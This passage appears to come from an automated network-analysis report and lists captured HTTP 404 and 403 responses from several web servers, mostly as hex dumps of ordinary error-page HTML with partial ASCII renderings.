6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:22:06 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 21 Nov 2022 18:22:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 21 Nov 2022 18:22:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 21 Nov 2022 18:22:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:22:43 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://xn--299aa717y.xn--3e0b707e/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 11649Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6d 8f ec c8 75 de 67 cd af a8 db 8b dd 99 96 ba d8 24 fb bd 7b 7a 64 ed 6a b5 16 a2 b5 85 bd 2b 1b 81 56 b8 a8 26 0f c9 da 29 56 d1 c5 e2 74 f7 8e 07 10 10 c7 f0 1b 9c 04 96 61 23 90 02 1b 88 e1 04 f9 22 24 0a a0 0f 49 7e 90 f6 ea 3f e4 14 d9 ef c3 9e e9 3b f7 5e 19 89 76 5e 48 d6 a9 73 9e f3 9c e7 3c 97 cf be fd fb 1f 7c fa af bf ff 21 49 4c 2a ae ce 2e ed 8b 08 26 e3 69 e3 5a d1 7f f5 49 c3 c6 80 85 57 67 5f bb 4c c1 30 12 24 4c e7 60 a6 8d 1f 7c fa 1d 3a 6c 90 f6 e6 46 b2 14 a6 8d 1b 0e f3 4c 69 d3 20 81 92 06 24 66 ce 79 68 92 69 08 37 3c 00 5a 1e 5a 84 4b 6e 38 13 34 0f 98 80 a9 57 e2 ec c0 9c 6b 35 53 26 3f df 80 9c 4b c5 65 08 8b 16 91 2a 52 42 a8 f9 79 59 62 b8 11 70 f5 eb bf fe fb 97 3f fb c5 cb 7f fe f1 97 ff f4 bf c8 cb 9f ff 9f 97 3f fb 13 f2 f2 cf fe 9e bc fc bb 3f 7d f9 b3 bf 22 ef bd 33 f4 3d 6f 42 62 15 2b a3 b2 cb 76 55 75 76 29 b8 bc 26 1a c4 f4 3c 94 39 cd 34 44 60 82 e4 9c 24 f8 35 3d 6f b7 17 92 52 7f 34 62 6c e0 0d 96 8e 3d 75 c0 9d 0d dc 01 54 dd 37 f5 0d 26 0c 68 c9 0c 34 88 59 66 a8 03 cb 32 c1 03 66 b8 92 6d 9d e7 df 58 a4 02 af 6c df 69 63 c5 83 bc a7 d9 1f 15 6a 42 7e fd 93 ff f5 e5 df fc b4 51 b5 6d 24 c6 64 e3 87 7a b7 23 80 b0 dd 78 93 0c be fc ab bf f9 d5 2f 7f fc ca 44 02 95 a6 b8 9d 7c 97 51 1e 68 9e 99 ab b3 39 ee 4b cd 9d 17 f3 0c 52 f5 39 7f 0e c6 70 19 e7 64 4a 6e 1b 33 96 c3 0f b4 68 8c cb 1e f9 f8 b3 f6 67 ed dc 99 3b 4a c7 9f b5 79 ca 62 c8 3f 43 70 0d 9f b5 cb e2 cf da 5e d7 71 1d f7 b3 f6 c0 5f 0c fc cf da 8d 56 03 16 06 eb 9d 4c c6 78 c8 6f e2 a7 e1 61 61 89 86 ef 0f 2b 40 fc b2 67 55 e8 00 1a e3 db 06 3a 10 45 2c cb 56 f8 25 fc 71 55 3e 6b cf 33 ca 65 20 8a d0 b6 fd 3c 2f 03 25 00 c5 4d 01 ce ee a4 5c 3a 9f e7 df bc 01 3d ed 3b 9e e3 35 ee ee 26 67 ed af 3f 23 9f 26 3c 27 11 17 40 f0 cd 0a a3 68 0c 12 34 12 08 c9 d7 db 67 cf a2 42 06 76 a3 17 d0 62 2d d3 bc bd 61 9a c8 96 6e a9 16 9f 32 27 d0 80 99 1f 0a b0 5b b9 68 04 4c de b0 bc d1 6c 65 53 ee c4 60 3e 50 d2 a0 6c ef bd b7 7b ba 68 f8 61 a3 39 59 03 93 1c a1 57 c0 6c fa dc 68 5c 9a 13 69 95 7e 90 30 fd 81 0a a1 05 d3 8b cc 09 70 0e fd 09 04 e6 c2 6d b9 2d ee cc 79 68 12 7c 27 c0 e3 c4 60 47 07 87 10 9f 5a 7c e6 58 27 2e 2f 0c 8e d6 82 26 a6 bb 4d cc 34 ea db cc b0 1f 7c f2 bd 8b 66 73 a2 c1 14 5a 92 a7 e3 9a 15 2e 4c a7 d3 3d ec bb cd 60 c1 05 54 63 99 fb 4a 55 a6 45 19 8c 93 eb Data Ascii: rmug${zdj+V&)Vta#"$I~?;^v^Hs<|
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:22:45 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://xn--299aa717y.xn--3e0b707e/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 11649Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6d 8f ec c8 75 de 67 cd af a8 db 8b dd 99 96 ba d8 24 fb bd 7b 7a 64 ed 6a b5 16 a2 b5 85 bd 2b 1b 81 56 b8 a8 26 0f c9 da 29 56 d1 c5 e2 74 f7 8e 07 10 10 c7 f0 1b 9c 04 96 61 23 90 02 1b 88 e1 04 f9 22 24 0a a0 0f 49 7e 90 f6 ea 3f e4 14 d9 ef c3 9e e9 3b f7 5e 19 89 76 5e 48 d6 a9 73 9e f3 9c e7 3c 97 cf be fd fb 1f 7c fa af bf ff 21 49 4c 2a ae ce 2e ed 8b 08 26 e3 69 e3 5a d1 7f f5 49 c3 c6 80 85 57 67 5f bb 4c c1 30 12 24 4c e7 60 a6 8d 1f 7c fa 1d 3a 6c 90 f6 e6 46 b2 14 a6 8d 1b 0e f3 4c 69 d3 20 81 92 06 24 66 ce 79 68 92 69 08 37 3c 00 5a 1e 5a 84 4b 6e 38 13 34 0f 98 80 a9 57 e2 ec c0 9c 6b 35 53 26 3f df 80 9c 4b c5 65 08 8b 16 91 2a 52 42 a8 f9 79 59 62 b8 11 70 f5 eb bf fe fb 97 3f fb c5 cb 7f fe f1 97 ff f4 bf c8 cb 9f ff 9f 97 3f fb 13 f2 f2 cf fe 9e bc fc bb 3f 7d f9 b3 bf 22 ef bd 33 f4 3d 6f 42 62 15 2b a3 b2 cb 76 55 75 76 29 b8 bc 26 1a c4 f4 3c 94 39 cd 34 44 60 82 e4 9c 24 f8 35 3d 6f b7 17 92 52 7f 34 62 6c e0 0d 96 8e 3d 75 c0 9d 0d dc 01 54 dd 37 f5 0d 26 0c 68 c9 0c 34 88 59 66 a8 03 cb 32 c1 03 66 b8 92 6d 9d e7 df 58 a4 02 af 6c df 69 63 c5 83 bc a7 d9 1f 15 6a 42 7e fd 93 ff f5 e5 df fc b4 51 b5 6d 24 c6 64 e3 87 7a b7 23 80 b0 dd 78 93 0c be fc ab bf f9 d5 2f 7f fc ca 44 02 95 a6 b8 9d 7c 97 51 1e 68 9e 99 ab b3 39 ee 4b cd 9d 17 f3 0c 52 f5 39 7f 0e c6 70 19 e7 64 4a 6e 1b 33 96 c3 0f b4 68 8c cb 1e f9 f8 b3 f6 67 ed dc 99 3b 4a c7 9f b5 79 ca 62 c8 3f 43 70 0d 9f b5 cb e2 cf da 5e d7 71 1d f7 b3 f6 c0 5f 0c fc cf da 8d 56 03 16 06 eb 9d 4c c6 78 c8 6f e2 a7 e1 61 61 89 86 ef 0f 2b 40 fc b2 67 55 e8 00 1a e3 db 06 3a 10 45 2c cb 56 f8 25 fc 71 55 3e 6b cf 33 ca 65 20 8a d0 b6 fd 3c 2f 03 25 00 c5 4d 01 ce ee a4 5c 3a 9f e7 df bc 01 3d ed 3b 9e e3 35 ee ee 26 67 ed af 3f 23 9f 26 3c 27 11 17 40 f0 cd 0a a3 68 0c 12 34 12 08 c9 d7 db 67 cf a2 42 06 76 a3 17 d0 62 2d d3 bc bd 61 9a c8 96 6e a9 16 9f 32 27 d0 80 99 1f 0a b0 5b b9 68 04 4c de b0 bc d1 6c 65 53 ee c4 60 3e 50 d2 a0 6c ef bd b7 7b ba 68 f8 61 a3 39 59 03 93 1c a1 57 c0 6c fa dc 68 5c 9a 13 69 95 7e 90 30 fd 81 0a a1 05 d3 8b cc 09 70 0e fd 09 04 e6 c2 6d b9 2d ee cc 79 68 12 7c 27 c0 e3 c4 60 47 07 87 10 9f 5a 7c e6 58 27 2e 2f 0c 8e d6 82 26 a6 bb 4d cc 34 ea db cc b0 1f 7c f2 bd 8b 66 73 a2 c1 14 5a 92 a7 e3 9a 15 2e 4c a7 d3 3d ec bb cd 60 c1 05 54 63 99 fb 4a 55 a6 45 19 8c 93 eb Data Ascii: rmug${zdj+V&)Vta#"$I~?;^v^Hs<|
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:22:47 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://xn--299aa717y.xn--3e0b707e/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 11649Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6d 8f ec c8 75 de 67 cd af a8 db 8b dd 99 96 ba d8 24 fb bd 7b 7a 64 ed 6a b5 16 a2 b5 85 bd 2b 1b 81 56 b8 a8 26 0f c9 da 29 56 d1 c5 e2 74 f7 8e 07 10 10 c7 f0 1b 9c 04 96 61 23 90 02 1b 88 e1 04 f9 22 24 0a a0 0f 49 7e 90 f6 ea 3f e4 14 d9 ef c3 9e e9 3b f7 5e 19 89 76 5e 48 d6 a9 73 9e f3 9c e7 3c 97 cf be fd fb 1f 7c fa af bf ff 21 49 4c 2a ae ce 2e ed 8b 08 26 e3 69 e3 5a d1 7f f5 49 c3 c6 80 85 57 67 5f bb 4c c1 30 12 24 4c e7 60 a6 8d 1f 7c fa 1d 3a 6c 90 f6 e6 46 b2 14 a6 8d 1b 0e f3 4c 69 d3 20 81 92 06 24 66 ce 79 68 92 69 08 37 3c 00 5a 1e 5a 84 4b 6e 38 13 34 0f 98 80 a9 57 e2 ec c0 9c 6b 35 53 26 3f df 80 9c 4b c5 65 08 8b 16 91 2a 52 42 a8 f9 79 59 62 b8 11 70 f5 eb bf fe fb 97 3f fb c5 cb 7f fe f1 97 ff f4 bf c8 cb 9f ff 9f 97 3f fb 13 f2 f2 cf fe 9e bc fc bb 3f 7d f9 b3 bf 22 ef bd 33 f4 3d 6f 42 62 15 2b a3 b2 cb 76 55 75 76 29 b8 bc 26 1a c4 f4 3c 94 39 cd 34 44 60 82 e4 9c 24 f8 35 3d 6f b7 17 92 52 7f 34 62 6c e0 0d 96 8e 3d 75 c0 9d 0d dc 01 54 dd 37 f5 0d 26 0c 68 c9 0c 34 88 59 66 a8 03 cb 32 c1 03 66 b8 92 6d 9d e7 df 58 a4 02 af 6c df 69 63 c5 83 bc a7 d9 1f 15 6a 42 7e fd 93 ff f5 e5 df fc b4 51 b5 6d 24 c6 64 e3 87 7a b7 23 80 b0 dd 78 93 0c be fc ab bf f9 d5 2f 7f fc ca 44 02 95 a6 b8 9d 7c 97 51 1e 68 9e 99 ab b3 39 ee 4b cd 9d 17 f3 0c 52 f5 39 7f 0e c6 70 19 e7 64 4a 6e 1b 33 96 c3 0f b4 68 8c cb 1e f9 f8 b3 f6 67 ed dc 99 3b 4a c7 9f b5 79 ca 62 c8 3f 43 70 0d 9f b5 cb e2 cf da 5e d7 71 1d f7 b3 f6 c0 5f 0c fc cf da 8d 56 03 16 06 eb 9d 4c c6 78 c8 6f e2 a7 e1 61 61 89 86 ef 0f 2b 40 fc b2 67 55 e8 00 1a e3 db 06 3a 10 45 2c cb 56 f8 25 fc 71 55 3e 6b cf 33 ca 65 20 8a d0 b6 fd 3c 2f 03 25 00 c5 4d 01 ce ee a4 5c 3a 9f e7 df bc 01 3d ed 3b 9e e3 35 ee ee 26 67 ed af 3f 23 9f 26 3c 27 11 17 40 f0 cd 0a a3 68 0c 12 34 12 08 c9 d7 db 67 cf a2 42 06 76 a3 17 d0 62 2d d3 bc bd 61 9a c8 96 6e a9 16 9f 32 27 d0 80 99 1f 0a b0 5b b9 68 04 4c de b0 bc d1 6c 65 53 ee c4 60 3e 50 d2 a0 6c ef bd b7 7b ba 68 f8 61 a3 39 59 03 93 1c a1 57 c0 6c fa dc 68 5c 9a 13 69 95 7e 90 30 fd 81 0a a1 05 d3 8b cc 09 70 0e fd 09 04 e6 c2 6d b9 2d ee cc 79 68 12 7c 27 c0 e3 c4 60 47 07 87 10 9f 5a 7c e6 58 27 2e 2f 0c 8e d6 82 26 a6 bb 4d cc 34 ea db cc b0 1f 7c f2 bd 8b 66 73 a2 c1 14 5a 92 a7 e3 9a 15 2e 4c a7 d3 3d ec bb cd 60 c1 05 54 63 99 fb 4a 55 a6 45 19 8c 93 eb Data Ascii: rmug${zdj+V&)Vta#"$I~?;^v^Hs<|
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:22:49 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://xn--299aa717y.xn--3e0b707e/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2X-nginx-cache: WordPressTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 37 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 2d 4b 52 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e ed 8e 98 ec 9d b4 ec a7 80 eb a5 bc 20 ec b0 be ec 9d 84 20 ec 88 98 20 ec 97 86 ec 9d 8c 20 26 23 38 32 31 31 3b 20 67 6f 67 6f 74 6f 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 78 6e 2d 2d 32 39 39 61 61 37 31 37 79 2e 78 6e 2d 2d 33 65 30 62 37 30 37 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 67 6f 67 6f 74 6f 70 20 26 72 61 71 75 6f 3b 20 ed 94 bc eb 93 9c 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 78 6e 2d 2d 32 39 39 61 61 37 31 37 79 2e 78 6e 2d 2d 33 65 30 62 37 30 37 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 67 6f 67 6f 74 6f 70 20 26 72 61 71 75 6f 3b 20 eb 8c 93 ea b8 80 20 ed 94 bc eb 93 9c 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 78 6e 2d 2d 32 39 39 61 61 37 31 37 79 2e 78 6e 2d 2d 33 65 30 62 37 30 37 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 Data Ascii: 277a<!DOCTYPE html><html lang="ko-KR"><head><meta charset="UTF-8" /><meta name
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 21 Nov 2022 18:22:55 GMTContent-Type: text/html; charset=utf-8Content-Length: 39481Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 21 Nov 2022 18:22:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 39481Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 